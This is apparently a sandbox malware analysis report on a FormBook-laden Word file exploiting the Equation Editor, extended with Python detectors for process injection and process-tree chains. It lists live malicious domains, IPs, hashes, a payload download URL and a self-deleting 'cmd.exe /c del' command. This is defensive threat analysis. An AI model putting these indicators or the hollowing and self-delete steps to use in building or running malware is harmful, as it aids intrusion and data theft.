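    """Return (base, reason) for each region that looks like injected code.

    A legitimately loaded module is MEM_IMAGE and backed by a file on disk. A
    PE header, or any executable code, sitting in memory that is not image
    backed got there through WriteProcessMemory / NtMapViewOfSection, which
    is exactly the pattern the report records.
    """
    findings = []
    for region in regions:
        executable = bool(region["protect"] & EXECUTE_MASK)
        if region["type"] == MEM_IMAGE or not executable:
            continue
        if has_pe_header(region["data"]):
            findings.append((region["base"], "private executable region with PE header"))
        else:
            findings.append((region["base"], "private executable region without PE header"))
    return findings


def build_pe_stub() -> bytes:
    """Minimal MZ/PE header: e_lfanew at 0x3C points to 'PE\\0\\0' at 0x40."""
    buf = bytearray(0x100)
    buf[0:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x40)
    buf[0x40:0x44] = b"PE\x00\x00"
    return bytes(buf)


# Constructed snapshot of the hollowed msiexec.exe, modelled on the report.
SAMPLE_REGIONS = [
    # a real loader-mapped module: image-backed, execute+read, never flagged
    {"base": 0x77000000, "protect": PAGE_EXECUTE_READ, "type": MEM_IMAGE, "data": build_pe_stub()},
    # the payload written in place of the unmapped msiexec.exe image at 0xB50000
    {"base": 0x00B50000, "protect": PAGE_EXECUTE_READWRITE, "type": MEM_PRIVATE, "data": build_pe_stub()},
    # an RWX private region holding position-independent code, no header
    {"base": 0x00370000, "protect": PAGE_EXECUTE_READWRITE, "type": MEM_PRIVATE,
     "data": b"\x55\x8b\xec" + b"\x90" * 61},
    # an ordinary heap region: private but not executable
    {"base": 0x02590000, "protect": PAGE_READWRITE, "type": MEM_PRIVATE, "data": bytes(64)},
    # a guard page, as in "page read and write | page guard" above: not executable
    {"base": 0x007F0000, "protect": PAGE_READWRITE | PAGE_GUARD, "type": MEM_PRIVATE, "data": bytes(64)},
]

if __name__ == "__main__":
    for base, reason in find_injected_regions(SAMPLE_REGIONS):
        print(f"0x{base:08X}: {reason}")
```

The "with PE header" case is what the Yara rules above matched in the .unpack dumps; the header-less case is where to look when the injector strips or wipes the MZ/PE signature after mapping, which this rule would still catch on the protection and type alone.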
Queues an APC in another process (thread injection)
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe, Thread APC queued: target process: C:\Windows\explorer.exe

Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe, Thread register set: target process: 1764
Source: C:\Windows\SysWOW64\msiexec.exe, Thread register set: target process: 1764

Further observations (untitled in the source):
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Process created: C:\Users\user\AppData\Roaming\seasonhd72463.exe C:\Users\user\AppData\Roaming\seasonhd72463.exe
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe, Process created: C:\Users\user\AppData\Roaming\seasonhd72463.exe C:\Users\user\AppData\Roaming\seasonhd72463.exe
Source: C:\Windows\SysWOW64\msiexec.exe, Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\seasonhd72463.exe'
Source: explorer.exe, 00000006.00000000.425645466.0000000000750000.00000002.00020000.sdmp, msiexec.exe, 00000007.00000002.679519269.0000000000B70000.00000002.00020000.sdmp, Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000000.446662524.0000000000255000.00000004.00000020.sdmp, Binary or memory string: ProgmanG
Source: explorer.exe, 00000006.00000000.425645466.0000000000750000.00000002.00020000.sdmp, msiexec.exe, 00000007.00000002.679519269.0000000000B70000.00000002.00020000.sdmp, Binary or memory string: !Progman
Source: explorer.exe, 00000006.00000000.425645466.0000000000750000.00000002.00020000.sdmp, msiexec.exe, 00000007.00000002.679519269.0000000000B70000.00000002.00020000.sdmp, Binary or memory string: Program Manager<
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe, Queries volume information: C:\Users\user\AppData\Roaming\seasonhd72463.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Note: the process-creation lines give the full chain in order: the Equation Editor launches the dropped seasonhd72463.exe, the dropper re-launches its own image (the instance that gets hollowed), and the injected msiexec.exe finally runs cmd.exe /c del to remove the dropper from disk once the payload lives elsewhere. Shell_TrayWnd and Progman are explorer.exe window-class names; injectors commonly resolve the shell process by calling FindWindow on them rather than by walking the process list. The MachineGuid registry value is a common source for a stable per-victim identifier.
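The process-creation lines in this section form a chain that endpoint telemetry can match without any file-based signature. The rules below are an added example, not part of the sandbox report and not a vendor rule set: they replay constructed Sysmon-style process-creation events that mirror the chain above (EQNEDT32.EXE starting a dropped EXE under AppData\Roaming, the EXE re-launching its own image, msiexec.exe running cmd.exe /c del on the dropper) and emit one alert per matching rule. The event field names (image, parent, cmdline), the parent and command line of EQNEDT32.EXE, and the document path are assumptions of this example.

```python
"""Process-tree rules for the execution chain recorded above (added example)."""
import re
from pathlib import PureWindowsPath

# "/c del" followed by an optionally quoted path ending in .exe
SELF_DELETE = re.compile(r"""/c\s+del\s+['"]?(?P<path>[^'"]+\.exe)""", re.IGNORECASE)


def _basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def rule_eqnedt_child(ev: dict) -> bool:
    """Equation Editor has no reason to create processes; any child is the
    CVE-2017-11882 / CVE-2018-0802 exploitation pattern flagged in this report."""
    return _basename(ev["parent"]) == "eqnedt32.exe"


def rule_self_reexec_from_appdata(ev: dict) -> bool:
    """A binary under AppData launching a second copy of itself: the crypter
    stub starting the instance it is about to hollow."""
    image = ev["image"].lower()
    return image == ev["parent"].lower() and "\\appdata\\" in image


def rule_self_delete(ev: dict) -> bool:
    """cmd.exe /c del of an .exe under AppData: the dropper cleaning itself up."""
    if _basename(ev["image"]) != "cmd.exe":
        return False
    match = SELF_DELETE.search(ev["cmdline"])
    return bool(match) and "\\appdata\\" in match.group("path").lower()


def rule_msiexec_spawns_shell(ev: dict) -> bool:
    """msiexec.exe spawning a shell is rare outside installers; here msiexec is the injected host."""
    return _basename(ev["parent"]) == "msiexec.exe" and _basename(ev["image"]) in {"cmd.exe", "powershell.exe"}


RULES = {
    "eqnedt_child": rule_eqnedt_child,
    "self_reexec_from_appdata": rule_self_reexec_from_appdata,
    "self_delete": rule_self_delete,
    "msiexec_spawns_shell": rule_msiexec_spawns_shell,
}


def detect(events: list) -> list:
    """Return (rule_name, image) for every rule that fires on every event, in event order."""
    return [(name, ev["image"]) for ev in events for name, rule in RULES.items() if rule(ev)]


EQNEDT = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
DROPPER = r"C:\Users\user\AppData\Roaming\seasonhd72463.exe"
MSIEXEC = r"C:\Windows\SysWOW64\msiexec.exe"

# Constructed events following the process tree in this report.
SAMPLE_EVENTS = [
    {"image": r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" "C:\Users\user\Desktop\C.V_Job Request.doc"'},
    {"image": EQNEDT, "parent": r"C:\Windows\System32\svchost.exe",   # COM launch; parent and args assumed
     "cmdline": '"' + EQNEDT + '" -Embedding'},
    {"image": DROPPER, "parent": EQNEDT, "cmdline": DROPPER},
    {"image": DROPPER, "parent": DROPPER, "cmdline": DROPPER},
    {"image": MSIEXEC, "parent": r"C:\Windows\explorer.exe", "cmdline": MSIEXEC},
    {"image": r"C:\Windows\SysWOW64\cmd.exe", "parent": MSIEXEC,
     "cmdline": r"C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\seasonhd72463.exe'"},
]

if __name__ == "__main__":
    for name, image in detect(SAMPLE_EVENTS):
        print(f"[{name}] {image}")
```

The first rule is the high-confidence one and matches the Sigma detection named in this report; the other three are corroborating signals that also fire on unrelated loaders, so they belong in a correlation rule keyed on the same process tree rather than as stand-alone alerts.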

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match, File source: 5.2.seasonhd72463.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 5.0.seasonhd72463.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match, File source: 5.0.seasonhd72463.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.2.seasonhd72463.exe.371add0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.2.seasonhd72463.exe.36cb5b0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 5.2.seasonhd72463.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match, File source: 5.0.seasonhd72463.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 5.0.seasonhd72463.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000002.461772968.00000000002C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000000.446015383.00000000095A6000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000002.461730443.0000000000240000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.679248868.0000000000370000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.679329977.00000000006F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000000.422302029.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000002.461861564.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.424749039.0000000003599000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000000.453979241.00000000095A6000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000000.421906811.0000000000400000.00000040.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook
Source: Yara match, same 19 unpacked-PE and memory-dump sources as listed under "Stealing of Sensitive Information" above (the list is repeated verbatim in the original report).

Mitre Att&ck Matrix

The matrix is rendered here one tactic per line. The bracketed digits are the signature-count badges attached to a technique in the original rendering and are kept exactly as they appeared; only badged techniques were observed for this sample, the unbadged entries are the remaining cells of the matrix template.

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: Shared Modules [1]; Exploitation for Client Execution [13]; At (Linux); At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter
Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
Privilege Escalation: Process Injection [612]; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
Defense Evasion: Rootkit [1]; Masquerading [1]; Disable or Modify Tools [1]; Virtualization/Sandbox Evasion [31]; Process Injection [612]; Deobfuscate/Decode Files or Information [1]; Obfuscated Files or Information [41]; Software Packing [13]
Credential Access: Credential API Hooking [1]; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: Security Software Discovery [321]; Process Discovery [2]; Virtualization/Sandbox Evasion [31]; Remote System Discovery [1]; File and Directory Discovery [1]; System Information Discovery [113]; Network Sniffing; Network Service Scanning
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot
Collection: Credential API Hooking [1]; Archive Collected Data [1]; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Command and Control: Encrypted Channel [1]; Ingress Tool Transfer [12]; Non-Application Layer Protocol [2]; Application Layer Protocol [122]; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue

Behavior Graph

Behavior Graph ID: 510259
Sample: C.V_Job Request.doc
Start date: 27/10/2021
Architecture: WINDOWS
Score: 100

Sample-level signatures: Multi AV Scanner detection for domain / URL; Found malware configuration; Malicious sample detected (through community Yara rule); 15 other signatures

Process tree as drawn in the graph (badge counters from the graph kept in parentheses):

C.V_Job Request.doc
  WINWORD.EXE (started; counters 291, 20)
    dropped: ~WRF{4A35DA17-E94D...C-120A276E213C}.tmp (Composite)
  EQNEDT32.EXE (started; counter 11)
    network: binatonezx.tk, 2.56.59.211, ports 49165 -> 80, GBTCLOUDUS, Netherlands
    dropped: C:\Users\user\AppData\...\seasonhd72463.exe (PE32)
    dropped: C:\Users\user\AppData\...\seasonzx[1].exe (PE32)
    signature: Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
    seasonhd72463.exe (started; counters 1, 5)
      signatures: Multi AV Scanner detection for dropped file; Tries to detect virtualization through RDTSC time measurements; Injects a PE file into a foreign processes
      seasonhd72463.exe (started, second instance)
        signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
        explorer.exe (injected)
          network: www.lenovoidc.com
          signature: System process connects to network (likely due to code injection or exploit)
          msiexec.exe (started)
            signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process
            cmd.exe (started)


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
C.V_Job Request.doc | 51% | Virustotal | -

Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{4A35DA17-E94D-4691-827C-120A276E213C}.tmp | 100% | Avira | EXP/CVE-2017-11882.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{4A35DA17-E94D-4691-827C-120A276E213C}.tmp | 100% | Joe Sandbox ML | -
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\seasonzx[1].exe | 23% | ReversingLabs | ByteCode-MSIL.Infostealer.Heye
C:\Users\user\AppData\Roaming\seasonhd72463.exe | 23% | ReversingLabs | ByteCode-MSIL.Infostealer.Heye

Unpacked PE Files

Source | Detection | Scanner | Label
5.2.seasonhd72463.exe.59d818.2.unpack | 100% | Avira | HEUR/AGEN.1104764
5.0.seasonhd72463.exe.400000.9.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
5.0.seasonhd72463.exe.400000.5.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
5.2.seasonhd72463.exe.380000.0.unpack | 100% | Avira | HEUR/AGEN.1104764
7.0.msiexec.exe.b50000.0.unpack | 100% | Avira | HEUR/AGEN.1104764
5.2.seasonhd72463.exe.400000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
5.0.seasonhd72463.exe.400000.7.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
7.2.msiexec.exe.b50000.0.unpack | 100% | Avira | HEUR/AGEN.1104764

Domains

Source | Detection | Scanner | Label
binatonezx.tk | 15% | Virustotal | -

URLs

Source | Detection | Scanner | Label
http://wellformedweb.org/CommentAPI/ | 0% | URL Reputation | safe
http://www.iis.fhg.de/audioPA | 0% | URL Reputation | safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe
http://treyresearch.net | 0% | URL Reputation | safe
http://www.collada.org/2005/11/COLLADASchema9Done | 0% | URL Reputation | safe
http://java.sun.com | 0% | URL Reputation | safe
http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
http://computername/printers/printername/.printer | 0% | Avira URL Cloud | safe
http://go.microsoft.c | 0% | URL Reputation | safe
http://www.%s.comPA | 0% | URL Reputation | safe
http://binatonezx.tk/seasonzx.exe | 100% | Avira URL Cloud | malware
www.agentpathleurre.space/s18y/ | 0% | Avira URL Cloud | safe
http://servername/isapibackend.dll | 0% | Avira URL Cloud | safe

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
binatonezx.tk | 2.56.59.211 | true | true | - | unknown
www.lenovoidc.com | unknown | unknown | true | - | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://binatonezx.tk/seasonzx.exe | true | Avira URL Cloud: malware | unknown
www.agentpathleurre.space/s18y/ | true | Avira URL Cloud: safe | low

Note: binatonezx.tk/seasonzx.exe is the payload download performed by EQNEDT32.EXE (the file arrives as seasonzx[1].exe and is copied to seasonhd72463.exe), while www.lenovoidc.com and www.agentpathleurre.space/s18y/ are contacted by the injected explorer.exe. The report marks the latter URL malicious even though Avira URL Cloud rates it safe; reputation services lag freshly registered command-and-control domains, so the report's classification should be treated as authoritative and the domain blocked.

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://www.windows.com/pctv.explorer.exe, 00000006.00000000.441403687.0000000002AE0000.00000002.00020000.sdmpfalse
              high
              http://investor.msn.comexplorer.exe, 00000006.00000000.441403687.0000000002AE0000.00000002.00020000.sdmpfalse
                high
                http://www.msnbc.com/news/ticker.txtexplorer.exe, 00000006.00000000.441403687.0000000002AE0000.00000002.00020000.sdmpfalse
                  high
                  http://wellformedweb.org/CommentAPI/explorer.exe, 00000006.00000000.443284470.0000000004650000.00000002.00020000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1explorer.exe, 00000006.00000000.446662524.0000000000255000.00000004.00000020.sdmpfalse
                    high
                    http://www.iis.fhg.de/audioPAexplorer.exe, 00000006.00000000.443284470.0000000004650000.00000002.00020000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1LMEMexplorer.exe, 00000006.00000000.510449681.00000000045D6000.00000004.00000001.sdmpfalse
                      high
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=trueexplorer.exe, 00000006.00000000.508717181.0000000002CC7000.00000002.00020000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://www.hotmail.com/oeexplorer.exe, 00000006.00000000.441403687.0000000002AE0000.00000002.00020000.sdmpfalse
                        high
                        http://treyresearch.netexplorer.exe, 00000006.00000000.443284470.0000000004650000.00000002.00020000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2explorer.exe, 00000006.00000000.449321006.0000000003DF8000.00000004.00000001.sdmpfalse
                          high
Name: http://www.collada.org/2005/11/COLLADASchema9Done
Source: seasonhd72463.exe, 00000004.00000002.424515254.0000000002591000.00000004.00000001.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown

Name: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000006.00000000.508717181.0000000002CC7000.00000002.00020000.sdmp
Malicious: false
Reputation: high

Name: http://java.sun.com
Source: explorer.exe, 00000006.00000000.446662524.0000000000255000.00000004.00000020.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown

Name: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000006.00000000.508717181.0000000002CC7000.00000002.00020000.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown

Name: http://www.msn.com/de-de/?ocid=iehp_2P&
Source: explorer.exe, 00000006.00000000.446662524.0000000000255000.00000004.00000020.sdmp
Malicious: false
Reputation: high

Name: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: seasonhd72463.exe, 00000004.00000002.425810745.0000000005060000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.447079678.0000000001BE0000.00000002.00020000.sdmp
Malicious: false
Reputation: high

Name: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000006.00000000.510496452.000000000460B000.00000004.00000001.sdmp
Malicious: false
Reputation: high

Name: http://investor.msn.com/
Source: explorer.exe, 00000006.00000000.441403687.0000000002AE0000.00000002.00020000.sdmp
Malicious: false
Reputation: high

Name: http://www.msn.com/?ocid=iehp
Source: explorer.exe, 00000006.00000000.430834779.00000000044E7000.00000004.00000001.sdmp
Malicious: false
Reputation: high

Name: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000006.00000000.430834779.00000000044E7000.00000004.00000001.sdmp
Malicious: false
Reputation: high

Name: http://computername/printers/printername/.printer
Source: explorer.exe, 00000006.00000000.443284470.0000000004650000.00000002.00020000.sdmp
Malicious: false
Antivirus Detection: Avira URL Cloud: safe
Reputation: low

Name: http://go.microsoft.c
Source: seasonhd72463.exe, 00000004.00000002.423882111.0000000000814000.00000004.00000020.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown

Name: http://www.%s.comPA
Source: seasonhd72463.exe, 00000004.00000002.425810745.0000000005060000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.447079678.0000000001BE0000.00000002.00020000.sdmp, msiexec.exe, 00000007.00000002.679548263.0000000001F70000.00000002.00020000.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: low

Name: http://www.autoitscript.com/autoit3
Source: explorer.exe, 00000006.00000000.446662524.0000000000255000.00000004.00000020.sdmp
Malicious: false
Reputation: high

Name: http://www.msn.com/de-de/?ocid=iehpT2P&
Source: explorer.exe, 00000006.00000000.446662524.0000000000255000.00000004.00000020.sdmp
Malicious: false
Reputation: high

Name: https://support.mozilla.org
Source: explorer.exe, 00000006.00000000.446662524.0000000000255000.00000004.00000020.sdmp
Malicious: false
Reputation: high

Name: http://servername/isapibackend.dll
Source: explorer.exe, 00000006.00000000.509688161.0000000003E50000.00000002.00020000.sdmp
Malicious: false
Antivirus Detection: Avira URL Cloud: safe
Reputation: low

                                              Contacted IPs


                                              Public

IP: 2.56.59.211
Domain: binatonezx.tk
Country: Netherlands
ASN: 395800
ASN Name: GBTCLOUDUS
Malicious: true

                                              General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 510259
Start date: 27.10.2021
Start time: 16:41:26
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 12m 1s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: C.V_Job Request.doc
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed: 11
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.expl.evad.winDOC@9/10@2/1
EGA Information: Failed
HDC Information:
• Successful, ratio: 21.6% (good quality ratio 20.9%)
• Quality average: 78.7%
• Quality standard deviation: 25.8%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 84
• Number of non-executed functions: 45
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .doc
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
• Not all processes were analyzed, report is missing behavior information
• Report size getting too big, too many NtCreateFile calls found.
• Report size getting too big, too many NtEnumerateValueKey calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.

                                              Simulations

                                              Behavior and APIs

Time      Type             Description
16:42:19  API Interceptor  47x Sleep call for process: EQNEDT32.EXE modified
16:42:21  API Interceptor  74x Sleep call for process: seasonhd72463.exe modified
16:42:45  API Interceptor  117x Sleep call for process: msiexec.exe modified
16:44:16  API Interceptor  1x Sleep call for process: explorer.exe modified

                                              Joe Sandbox View / Context

                                              IPs

Match: 2.56.59.211

Associated Sample Name / URL                        Detection   Context
Purchase order.doc                                  malicious   binatonezx.tk/villarzx.exe
Swift-copy.doc                                      malicious   binatonezx.tk/obinnazx.exe
RFQ for _RTO system packages product details.doc    malicious   binatonezx.tk/stanzx.exe
Purchase order_122.doc                              malicious   binatonezx.tk/catzx.exe
SMC Req Offer.doc                                   malicious   binatonezx.tk/seasonzx.exe
Original Shipping documents.doc                     malicious   binatonezx.tk/villarzx.exe
payment.doc                                         malicious   binatonezx.tk/davidhillzx.exe
_Payment Advise.doc                                 malicious   binatonezx.tk/trulexzx.exe
FLOW LINE CONTRACT00939.doc                         malicious   binatonezx.tk/asadzx.exe
QUOTE B1018530.doc                                  malicious   binatonezx.tk/mazx.exe
About company.doc                                   malicious   binatonezx.tk/gregzx.exe
Purchase order_122.doc                              malicious   binatonezx.tk/catzx.exe
PRICE QUOTATION.doc                                 malicious   binatonezx.tk/seasonzx.exe
PROFORMA INVOICE.doc__.rtf                          malicious   binatonezx.tk/obinnazx.exe
Purchase Order.doc                                  malicious   binatonezx.tk/villarzx.exe

                                              Domains

Match: binatonezx.tk

Associated Sample Name / URL                        Detection   Context
Purchase order.doc                                  malicious   2.56.59.211
Swift-copy.doc                                      malicious   2.56.59.211
RFQ for _RTO system packages product details.doc    malicious   2.56.59.211
Purchase order_122.doc                              malicious   2.56.59.211
SMC Req Offer.doc                                   malicious   2.56.59.211
Original Shipping documents.doc                     malicious   2.56.59.211
payment.doc                                         malicious   2.56.59.211
_Payment Advise.doc                                 malicious   2.56.59.211
FLOW LINE CONTRACT00939.doc                         malicious   2.56.59.211
QUOTE B1018530.doc                                  malicious   2.56.59.211
About company.doc                                   malicious   2.56.59.211
Purchase order_122.doc                              malicious   2.56.59.211
PRICE QUOTATION.doc                                 malicious   2.56.59.211
PROFORMA INVOICE.doc__.rtf                          malicious   2.56.59.211
Purchase Order.doc                                  malicious   2.56.59.211

                                              ASN

Match: GBTCLOUDUS

Associated Sample Name / URL                        Detection   Context
Purchase order.doc                                  malicious   2.56.59.211
setup_installer.exe                                 malicious   2.56.59.42
Swift-copy.doc                                      malicious   2.56.59.211
jGK42jrs2j.exe                                      malicious   2.56.59.42
DDEEBC8CCCC58E25CE1709B0E9A519B2BD46472E92860.exe   malicious   2.56.59.42
p3IJWYfJZw.exe                                      malicious   2.56.59.42
RFQ for _RTO system packages product details.doc    malicious   2.56.59.211
Purchase order_122.doc                              malicious   2.56.59.211
SMC Req Offer.doc                                   malicious   2.56.59.211
Original Shipping documents.doc                     malicious   2.56.59.211
6FD5C640F4C1E434978FDC59A8EC191134B7155217C84.exe   malicious   2.56.59.42
setup_x86_x64_install.exe                           malicious   2.56.59.42
0OeX2BsbUo.exe                                      malicious   2.56.59.42
AB948F038175411DC326A1AAD83DF48D6B65632501551.exe   malicious   2.56.59.42
365F984ABE68DDD398D7B749FB0E69B0F29DAF86F0E3E.exe   malicious   2.56.59.42
C03C8A4852301C1C54ED27EF130D0DE4CDFB98584ADEF.exe   malicious   2.56.59.42
Fri051e1e7444.exe                                   malicious   2.56.59.42
payment.doc                                         malicious   2.56.59.211
_Payment Advise.doc                                 malicious   2.56.59.211
wA5D1yZuTf.exe                                      malicious   2.56.59.42

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              No context

                                              Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\seasonzx[1].exe
Process: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: downloaded
Size (bytes): 526336
Entropy (8bit): 7.5320170434389455
Encrypted: false
SSDEEP: 12288:PG9ImHKQ6MQ0vN3h4Ip/uzEcrPuRj42GT:eJGA3h4Ip/uzrPAbG
MD5: 9227463FFB6E37D271919E06D175EDA7
SHA1: 549CCA1BD4031F3D302832754A1F3E51FFED065F
SHA-256: 5E529CBB901ACED8A6AF49250AFD3D67E059D717D7ECF3EDC32E18A9D549361C
SHA-512: 3C2673D5CA3BE9C723B8D34185299459A53F0D99B3F8ABD2821B73299D6DE83257CD4E850AC635C53598EB8CBD9574EE103B781C7C6952B69F2C6EE8C9B3E60B
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 23%
Reputation: low
IE Cache URL: http://binatonezx.tk/seasonzx.exe
